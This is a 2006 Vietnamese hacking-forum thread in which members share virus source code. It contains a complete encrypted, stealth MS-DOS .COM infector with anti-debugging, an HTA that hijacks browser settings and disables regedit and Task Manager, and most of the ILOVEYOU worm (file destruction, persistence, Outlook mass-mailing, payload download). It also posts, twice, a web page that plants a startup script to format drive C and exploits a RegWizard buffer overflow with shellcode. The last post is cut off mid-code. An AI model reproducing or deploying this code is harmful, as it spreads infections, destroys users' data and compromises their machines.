| [Question] Virus Coder |
10/07/2006 22:51:15 (+0700) | #1 | 5591 |
seven love
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 06/10/2004 18:08:22
Messages: 3
Offline
|
|
Lâu nay không động vào Virus tự nhiên hôm nay đọc thấy ngứa nghề quá. Có bạn nào có niềm đam mê virus giống tôi thì hãy lên tiếng nhé.
Thiên đàng dành cho Virus Coder: http://vx.netlux.org/
Chúc vui vẻ  |
|
|
 |
|
| [Question] Virus Coder |
11/07/2006 06:59:46 (+0700) | #2 | 5744 |
trojon
Member
|
|
0 |
|
|
Joined: 29/06/2006 22:36:06
Messages: 47
Offline
|
|
Cám ơn bác đã share
bạn có mã nguồn virus viết bằng ASM xin share giúp |
|
|
|
|
| [Question] Virus Coder |
12/07/2006 10:01:28 (+0700) | #3 | 6029 |
taianhlacontrai
Member
|
|
0 |
|
|
Joined: 30/06/2006 19:21:06
Messages: 53
Location: Tây nguyên
Offline
|
|
trojon wrote:
Cám ơn bác đã share
bạn có mã nguồn virus viết bằng ASM xin share giúp
hết hiểu trong đó đâu thiếu con viết bằng ASM hình như bạn của vào site đó mà đã cảm ơn theo quán tính
Virus for MS-DOS
Code:
; =======================================================================>
; 100% By MnemoniX - 1994
;
; This is a memory resident .COM infector which hides itself using
; directory stealth (11/12 and 4E/4F). To avoid setting heuristic
; flags in TBAV, it overwrites part of the decryption routine with
; garbage and adds instructions to repair it on the header of the
; program. Runs through TBAV flawlessly. Examine it in action and
; observe for yourself.
;
; This virus also includes debugger traps to thwart tracing.
; =======================================================================>
PING equ 30F4h ; give INT 21 this value ...
PONG equ 0DEADh ; if this returns we're res.
ID equ '%0' ; ID marker
HEADER_SIZE equ 22 ; 22 - byte .COM header
MARKER equ 20 ; marker at offset 20
code segment byte public 'code'
org 100h
assume cs:code
start:
db 17 dup (90h) ; simulate infected program
jmp virus_begin ; a real host program will
dw ID ; have some MOVs at the
host:
db 0CDh,20h ; beginning
db 20 dup(90h)
virus_begin:
db 0BBh ; mov bx,offset viral_code
code_offset dw offset virus_code
db 0B8h ; mov ax,cipher
cipher dw 0
mov cx,VIRUS_SIZE / 2 + 1 ; mov cx,length of code
decrypt:
xor [bx],ax ; in real infections,
ror ax,1 ; portions of this code
inc bx ; will be replaced with
inc bx ; dummy bytes, which will be
loop decrypt ; fixed up by the header.
; this complicates scanning
virus_code:
call $+3 ; BP is instruction pointer
pop bp
sub bp,offset $-1
xor ax,ax ; anti-trace ...
mov es,ax ; set interrupts 0-3 to point
mov di,ax ; to The Great Void in high
dec ax ; memory ...
mov cl,8
rep movsw
mov ax,PING ; test for residency
int 21h
cmp bx,PONG
je installed
in al,21h ; another anti-debugger
xor al,2 ; routine ... lock out
out 21h,al ; keyboard
xor al,2
out 21h,al
mov ax,ds ; not resident - install
dec ax ; ourselves in memory
mov ds,ax
sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1
sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1
mov ax,ds:[12h]
mov ds,ax
sub ax,15
mov es,ax
mov byte ptr ds:[0],'Z'
mov word ptr ds:[1],8
mov word ptr ds:[3],(MEM_SIZE + 15) / 16
push cs ; now move virus into memory
pop ds
mov di,100h
mov cx,(offset virus_end - offset start) / 2
lea si,[bp + offset start]
rep movsw
xor ax,ax ; change interrupt 21 to point
mov ds,ax ; to ourselves
mov si,21h * 4
mov di,offset old_int_21 ; (saving original int 21)
movsw
movsw
mov word ptr ds:[si - 2],0 ; anti-trace - temporarily
; kill int 21
mov ds:[si - 4],offset new_int_21
mov ds:[si - 2],es
installed:
push cs ; restore segregs
push cs
pop ds
pop es
lea si,[bp + offset host] ; and restore original
mov di,100h ; bytes of program
push di
mov cx,HEADER_SIZE
rep movsb
ret ; and we're done
; Interrupt 21 handler - trap file execute, search, open, read, and
; moves to the end of the file.
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,30F4h ; residency test?
je test_pass ; yes ....
cmp ax,4B00h ; file execute?
jne stealth
jmp execute ; yes, infect ...
stealth:
cmp ah,11h ; directory stealth
je dir_stealth_1
cmp ah,12h
je dir_stealth_1
cmp ah,4Eh ; more directory stealth
je dir_stealth_2
cmp ah,4Fh
je dir_stealth_2
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0
test_pass:
call int_21 ; get real DOS version
mov bx,PONG ; and give pass signal
iret
dir_stealth_1:
call int_21 ; perform directory search
cmp al,-1 ; no more files?
jne check_file
iret ; no, skip it
check_file:
push ax bx es ; check file for infection
mov ah,2Fh
int 21h
cmp byte ptr es:[bx],-1 ; check for extended FCB
jne no_ext_FCB
add bx,7
no_ext_FCB:
cmp word ptr es:[bx + 9],'OC'
jne fixed ; not .COM file, ignore
mov ax,word ptr es:[bx + 17h]
and al,31 ; check seconds -
cmp al,26 ; if 52, infected
jne fixed
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE
sbb word ptr es:[bx + 1Fh],0
fixed:
pop es bx ax
iret
dir_stealth_2:
call int_21 ; perform file search
jnc check_file_2 ; if found, proceed
retf 2 ; nope, leave
check_file_2:
push ax bx si es
mov ah,2Fh ; find DTA
int 21h
xor si,si ; verify that this is a .COM
find_ext:
cmp byte ptr es:[bx + si],'.'
je found_ext
inc si
jmp find_ext
found_ext:
cmp word ptr es:[bx + si + 1],'OC'
jne fixed_2 ; if not .COM, skip
mov ax,word ptr es:[bx + 16h]
and al,31 ; check for infection marker
cmp al,26
jne fixed_2 ; not found, skip
sub word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE
sbb word ptr es:[bx + 1Ch],0
fixed_2:
pop es si bx ax ; done
clc
retf 2
execute:
push ax bx cx dx di ds es ; file execute ... check
; if uninfected .COM file,
mov ax,3D00h ; and if so, infect
call int_21
jnc read_header
jmp exec_exit ; can't open, leave
read_header:
xchg ax,bx
push bx ; save file handle
mov ax,1220h ; get system file table
int 2Fh ; entry
nop ; remove this if you don't
; mind scanning as [512] under
; SCAN ...
mov bl,es:[di] ; get number of the SFT
mov ax,1216h ; for this handle
int 2Fh ; ES I now points to SFT
pop bx
mov word ptr es:[di + 2],2 ; change open mode to R/W
push word ptr es:[di + 13] ; save file date
push word ptr es:[di + 15] ; and file time
mov ax,word ptr es:[di + 11h]
cmp ax,62579 - VIRUS_SIZE ; too big?
je exec_close
cmp ax,22 ; too small?
jb exec_close
add ax,HEADER_SIZE - 3 ; calculate virus offset
push cs
pop ds
mov ds:virus_offset,ax
mov ah,3Fh ; read header of file
mov cx,HEADER_SIZE ; to check for infection
mov dx,offset read_buffer
call int_21
cmp word ptr ds:read_buffer,'ZM'
je exec_close ; don't infect .EXE
cmp word ptr ds:read_buffer[MARKER],ID ; if infected
je exec_close ; already, skip it
mov ax,4202h ; move to end of file
call move_ptr_write
mov dx,offset read_buffer ; and save header
call int_21
call encrypt_code ; encrypt the virus code
call create_header ; and create unique header
mov ah,40h
mov cx,VIRUS_SIZE ; write virus code to file
mov dx,offset encrypt_buffer
int 21h
mov ax,4200h ; back to beginning of file
call move_ptr_write
mov dx,offset new_header ; write new header
call int_21
pop dx ; restore file date & time
pop cx
and cl,0E0h ; but with timestamp
or cl,26
mov ax,5701h
int 21h
mov ah,3Eh ; close file
int 21h
exec_exit:
pop es ds di dx cx bx ax
jmp int_21_exit
move_ptr_write:
cwd ; move file pointer
xor cx,cx
int 21h
mov cx,HEADER_SIZE ; and prepare for write
mov ah,40h ; to file
ret
exec_close:
pop ax ax ; clean off stack
mov ah,3Eh ; and close
int 21h
jmp exec_exit
encrypt_code proc near
push si es
push cs
pop es
xor ah,ah ; get random no.
int 1Ah ; and store in decryption
mov cipher,dx ; module
mov ax,ds:virus_offset
add ax,DECRYPTOR_SIZE + 103h
mov code_offset,ax
mov si,offset virus_begin ; first store header
mov di,offset encrypt_buffer
mov cx,DECRYPTOR_SIZE
rep movsb ; (unencryted)
mov cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code
encrypt:
lodsw ; simple encryption routine
xor ax,dx
ror dx,1
stosw
loop encrypt
pop es si
ret
encrypt_code endp
create_header proc near
mov ax,ds:virus_offset ; fix up addresses in new
add ax,103h + (offset decrypt - offset virus_begin)
mov ds:mov_1,ax ; header
inc ax
inc ax
mov ds:mov_2,ax
xor ah,ah ; fill in useless MOVs
int 1Ah ; with random bytes
mov ds:mov_al,cl
mov ds:mov_ax,dx
push es cs
pop es
mov di,offset encrypt_buffer
add di,offset decrypt - offset virus_begin
mov ax,dx ; now fill decryption module
neg ax ; with some garbage
stosw
rol ax,1
stosw
pop es
sub word ptr ds:virus_offset,17 ; fix up JMP instruction
ret ; done
create_header endp
new_header db 0C7h,06
mov_1 dw 00
db 31h,07 ; first MOV 6
db 0B0h
mov_al db 00 ; a nothing MOV AL, 2
db 0C7h,06
mov_2 dw 00
db 0D1h,0C8h ; second MOV 6
db 0B8h
mov_ax dw 00 ; a nothing MOV AX, 3
db 0E9h ; jump instruction 1
virus_offset dw 0 ; virus offset 2
dw ID ; ID marker 2
; total bytes = 22
sig db '[100%] By MnemoniX 1994',0
virus_end:
VIRUS_SIZE equ offset virus_end - offset virus_begin
read_buffer dw HEADER_SIZE dup (?) ; storage for orig header
encrypt_buffer dw VIRUS_SIZE dup (?) ; storage for encrypted virus
heap_end:
MEM_SIZE equ offset heap_end - offset start
DECRYPTOR_SIZE equ offset virus_code - offset virus_begin
ENCRYPTED_SIZE equ offset virus_end - offset virus_code
code ends
end start
|
|
|
|
|
| [Question] Virus Coder |
13/07/2006 00:51:08 (+0700) | #4 | 6191 |
jackly
Member
|
|
0 |
|
|
Joined: 26/06/2006 20:17:52
Messages: 11
Location: CHV
Offline
|
|
| thank verry cái mã nguồn em đó ! |
|
|
|
|
| [Question] Virus Coder |
13/07/2006 04:03:50 (+0700) | #5 | 6233 |
taianhlacontrai
Member
|
|
0 |
|
|
Joined: 30/06/2006 19:21:06
Messages: 53
Location: Tây nguyên
Offline
|
|
| để học mà chứ đâu phải để dùng nó |
|
|
|
|
| [Question] Virus Coder |
14/07/2006 03:10:07 (+0700) | #6 | 6448 |
seven love
Member
|
|
0 |
|
|
Joined: 06/10/2004 18:08:22
Messages: 3
Offline
|
|
| Đoạn Code Virus của bạn Share hơi "Diễm Xưa" rồi. Thời nay Virus đâu còn lây trên COM file và thường trú trong MS-DOS nữa. |
|
|
|
|
| [Question] Virus Coder |
14/07/2006 03:39:44 (+0700) | #7 | 6455 |
seven love
Member
|
|
0 |
|
|
Joined: 06/10/2004 18:08:22
Messages: 3
Offline
|
|
Định viết một bài Tutorial về Virus trên Windows - dựa trên kinh nghiệm các user đã từng làm việc tại BKIS nhưng sợ Admin sẽ delete hết. Từ nay xin làm việc thiện không nghịch nữa.  |
|
|
|
|
| [Question] Virus Coder |
14/07/2006 05:54:40 (+0700) | #8 | 6487 |
![[Avatar]](/hvaonline/images/avatar/250d1f6e065c1f52355dbe1088d9f6c6.jpg "[Avatar]")
|
thangham
Member
|
|
0 |
|
|
Joined: 12/07/2006 16:50:39
Messages: 1
Offline
|
|
| cho em hoi làm thế nào để chương trình tự động gửi email cho mình (visual basic) |
|
|
|
|
| [Question] Re: Virus Coder |
04/12/2006 08:51:26 (+0700) | #9 | 27779 |
abaanh
Member
|
|
0 |
|
|
Joined: 03/12/2006 20:24:29
Messages: 23
Offline
|
|
| This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members. |
|
|
|
|
| [Question] Virus Coder |
04/12/2006 14:12:45 (+0700) | #10 | 27840 |
![[Avatar]](/hvaonline/images/avatar/3171b3bc8d19c82f38fef8b518aef833.jpg "[Avatar]")
|
ChinhVn
Elite Member
|
|
0 |
|
|
Joined: 07/05/2003 12:06:21
Messages: 80
Offline
|
|
seven love wrote:
Định viết một bài Tutorial về Virus trên Windows - dựa trên kinh nghiệm các user đã từng làm việc tại BKIS nhưng sợ Admin sẽ delete hết. Từ nay xin làm việc thiện không nghịch nữa.
Bồ viết tut với mục đích để học tập và nghiên cứu thì không ai xóa bài đâu mà sợ.  |
|
| |
|
|
|
| [Question] Re: Virus Coder |
04/12/2006 17:35:45 (+0700) | #11 | 27852 |
![[Avatar]](/hvaonline/images/avatar/089f41810321eefc3f4eef5d4a388e42.png "[Avatar]")
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
to abaanh: cảnh cáo 2 lần rồi đó. Lần thứ 3 thì khỏi log vào diễn đàn luôn.
Nên đọc kỹ lại nội quy diễn đàn và đặc biệt là quy định của box "Thảo luận virus, trojan..." trước khi tiếp tục sinh hoạt với diễn đàn. |
|
| What bringing us together is stronger than what pulling us apart. |
|
|
|
| [Question] Virus Coder |
12/12/2006 11:35:14 (+0700) | #12 | 29986 |
![[Avatar]](/hvaonline/images/avatar/b0881a25407fc4e5fdfef99ef79d9c36.jpg "[Avatar]")
|
hack9x
Member
|
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
các bác ah em chả biét tí gì vè virus cho lắm em mmuoons hỏi có mã virus rùi thì viết vào đâu mở soạn thảo source ra có thể viết đựoc không em chỉ biết vài cái đơn giản tỷ như đoạn hta để thay đổi mặc định trang chủ của máy như <html>
<HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no" showintaskbar="no">
<body onload="window.blur();">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
on error resume next
window.moveTo -1000,-1000
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "about:blank"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\default_page_url", ""
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url1","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url2","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url3","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IEXPLORE.EXE", "IEXPLORE.EXE http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMGR","1","REG_DWORD"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", "(¯`·_º-¦- WEL_COME_TO_HACK9X -¦-º_·´¯)^^_^^CAC_BAN_CO_THE_TRUY_CAP_TRANG_WEB_CUA_MINH_THEO_DIA_CHI^^_^^(¯`·_º-¦- WwW.TEEN9X.ISMY.LV-|-WwW.DEMTAN.ISMY.LV -¦-º_·´¯) "
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Games\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Launchcast\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Weather\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Sport\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\Save Password","1","REG_DWORD"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\Auto Login","1","REG_DWORD"
window.close
</script>
hoặc một đoạn virus iloveyou như sau
IIIIIIIIIIIIIII
II I LOVE YOU I
IIIIIIIIIIIhkmI
Este es el codigo fuente (en VBS) del virus "I love you" que le cayo al mundo
el 4 de mayo del 2000,Infectando rapidamente a millones de usuarios al explotar
una falta de seguridad en Microsoft Outlook, y ganando la atencion de la prensa.
rem barok -loveletter(vbe)
rem by: spyder / email / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about :blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
các bác nghiên cứu nha các bác thử vào đây coi
các bác thử vào đây coi www.tbns.net/quynhkheonline/2.bat
|
|
|
|
|
| [Question] Virus Coder |
12/12/2006 11:38:08 (+0700) | #13 | 29988 |
|
hack9x
Member
|
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
cái lày có thể bỏ vào tranng web lè
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
</p>
<script>
var1='echo @format "c: < c.txt >nul" >> c:\\autoexec.bat';
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\repair.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>wsh.Run('command /c echo e 171,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo e 181,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo w>> C:\\d.TXT',true,1);wsh.Run('command /c echo q >> C:\\d.TXT',true,1);wsh.Run('command /c echo y >> C:\\C.TXT',true,1);wsh.Run('command /c echo Sucker >> C:\\C.TXT',true,1);wsh.Run('command /c echo @echo Please wait while Setup updates your configuration files. >> c:\\autoexec.bat',true,1);wsh.Run('command /c echo @echo This may take a few minutes... >> c:\\autoexec.bat',true,1);wsh.Run('command /c "+var1+"',true,1);wsh.Run('command /c debug c:\\autoexec.bat < d.txt',true,1)</"+"SCRIPT>";scr.write();
</script>
<p>
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
</p>
<script language="VbScript">
expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "rundll32 shell32.dll,SHExitWindowsEx 1"
RegWizObj.InvokeRegWizard(expstr)
</script>
</html>
|
|
|
|
|
| [Question] Virus Coder |
12/12/2006 11:47:20 (+0700) | #14 | 29994 |
|
hack9x
Member
|
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
virus định giạngổ cứng
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
</p>
<script>
var1='echo @format "c: < c.txt >nul" >> c:\\autoexec.bat';
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\repair.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>wsh.Run('command /c echo e 171,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo e 181,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo w>> C:\\d.TXT',true,1);wsh.Run('command /c echo q >> C:\\d.TXT',true,1);wsh.Run('command /c echo y >> C:\\C.TXT',true,1);wsh.Run('command /c echo Sucker >> C:\\C.TXT',true,1);wsh.Run('command /c echo @echo Please wait while Setup updates your configuration files. >> c:\\autoexec.bat',true,1);wsh.Run('command /c echo @echo This may take a few minutes... >> c:\\autoexec.bat',true,1);wsh.Run('command /c "+var1+"',true,1);wsh.Run('command /c debug c:\\autoexec.bat < d.txt',true,1)</"+"SCRIPT>";scr.write();
</script>
<p>
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
</p>
<script language="VbScript">
expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
